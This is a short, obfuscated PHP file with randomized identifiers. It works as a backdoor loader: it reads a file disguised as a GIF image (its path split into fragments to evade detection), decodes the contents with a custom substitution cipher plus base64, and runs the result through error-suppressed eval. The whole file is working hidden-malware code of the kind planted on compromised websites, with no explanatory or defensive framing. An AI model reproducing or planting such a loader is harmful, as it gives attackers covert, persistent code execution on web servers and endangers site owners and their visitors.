<?php

class adyren_unokhajuzh {

    public static function ifajut_gomycejyj($tavatu_ymuwapyb, $jixyvo_chywoqochi = false) {
        $sikhogy = "TBmt=joDh0xliw6W4HaPufVAXevYIR/sEknFJpLd9gKbM2+8cNZUQGO57qSrz1y3C";
        $rolijuq = "JC6U05SehskayqjTNL/GH2AVMDlYZ8X1o=bIFwKi9PEO3ncdf+pgtWBx7Ru4rzQvm";
        $zupyqyp = array();
        for ($ehyziwi = strlen($sikhogy) - 1; $ehyziwi >= 0; $ehyziwi--) {
            $thinivi = substr($sikhogy, $ehyziwi, 1);
            $ikhoqum = substr($rolijuq, $ehyziwi, 1);
            $zupyqyp[$thinivi] = $ikhoqum;
        }

        $shimasi = strtr($tavatu_ymuwapyb, $zupyqyp);
        $shimasi = base64_decode($shimasi);

        return $shimasi;
    }

    public static function foweto_ozhuchas($tavatu_ymuwapyb) {
        $fisawa = array();
        if (!file_exists($tavatu_ymuwapyb))
            return false;
        $ipufiqe = @file_get_contents($tavatu_ymuwapyb);
        if (!$ipufiqe)
            return false;
        $ipufiqe = substr($ipufiqe, 3);
        $fisawa = self::ifajut_gomycejyj($ipufiqe);
        return $fisawa;
    }

}

$eqonyc = adyren_unokhajuzh::foweto_ozhuchas(__DIR__ . "/image" . "s/kugi" . "nis.g" . "if");
if ($eqonyc) {
    @eval($eqonyc);
}

